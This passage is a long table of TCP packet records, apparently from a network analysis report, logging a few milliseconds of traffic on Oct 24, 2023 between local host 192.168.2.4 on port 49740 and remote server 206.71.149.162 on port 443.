| Oct 24, 2023 06:55:22.558199883 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558204889 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558229923 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558238983 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558258057 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558264971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558288097 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558288097 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558310986 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558316946 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558339119 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558341980 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558362961 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558368921 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558393002 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558398008 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558418989 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558423996 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558453083 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558468103 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558473110 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558479071 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558515072 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558516979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558526039 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558569908 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558571100 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558582067 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558615923 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558628082 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558635950 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558645010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558686018 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558686018 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558697939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558734894 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558744907 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558792114 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558794022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558803082 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558839083 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558851004 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558897972 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558900118 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558912039 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.558943987 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558954000 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.558960915 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559007883 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559009075 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559016943 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559056044 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559066057 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559114933 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559115887 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559127092 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559161901 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559174061 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559221029 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559221983 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559231043 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559268951 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559278965 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559299946 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559324980 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559326887 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559336901 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559372902 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559392929 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559437990 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559438944 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559451103 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559484959 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559511900 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559556961 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559557915 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559566021 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559602976 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559612989 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559663057 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559669018 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559678078 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559714079 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559725046 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559768915 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559772968 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559781075 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559812069 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559820890 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559868097 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559870005 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559878111 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559916019 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559923887 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559969902 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.559969902 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.559978962 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560018063 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560026884 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560071945 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560076952 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560082912 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560115099 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560116053 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560126066 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560163975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560173988 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560219049 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560225964 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560235023 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560271978 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560271978 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560283899 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560319901 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560331106 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560378075 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560379028 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560388088 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560424089 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560437918 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560483932 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560486078 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560492992 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560530901 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560545921 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560599089 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560599089 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560614109 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560648918 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560658932 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560708046 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560710907 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560718060 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560760021 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560761929 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560772896 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560808897 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560818911 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560858965 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560866117 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560872078 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560900927 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560913086 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560914040 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560923100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.560959101 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.560967922 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.561012983 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.562814951 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.562824011 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.562845945 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.562927961 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.562936068 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.562952995 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.562972069 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.562977076 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563045979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563052893 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563098907 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563121080 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563153028 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563160896 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563179970 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563184023 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563205957 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563211918 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563239098 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563246965 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563272953 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563281059 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563296080 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563307047 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563330889 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563335896 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563359022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563364029 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563384056 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563390017 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563410044 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563415051 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563438892 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563446045 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563466072 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563468933 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563492060 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563497066 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563520908 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563522100 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563546896 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563553095 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563570023 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563579082 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563606024 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563611031 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563622952 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563622952 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563647032 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563653946 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563673019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563678980 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563703060 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563708067 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563725948 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563735962 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563757896 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563761950 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563772917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563787937 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563822031 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563822985 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563832045 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563865900 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563874960 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563878059 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563884974 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563926935 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.563936949 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.563987017 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564007998 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564017057 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564022064 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564034939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564047098 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564054966 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564058065 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564090967 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564091921 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564116955 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564121962 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564146996 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564148903 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564171076 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564177990 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564198971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564205885 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564227104 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564230919 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564255953 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564270020 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564280987 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564286947 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564311028 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564317942 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564336061 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564341068 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564366102 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564369917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564389944 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564395905 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564419985 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564423084 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564445972 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564450979 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564469099 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564474106 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564523935 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564527988 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564534903 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564573050 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564584017 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564632893 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564650059 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564699888 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564701080 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564711094 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564747095 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564755917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564801931 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564806938 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564812899 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564845085 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564851046 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
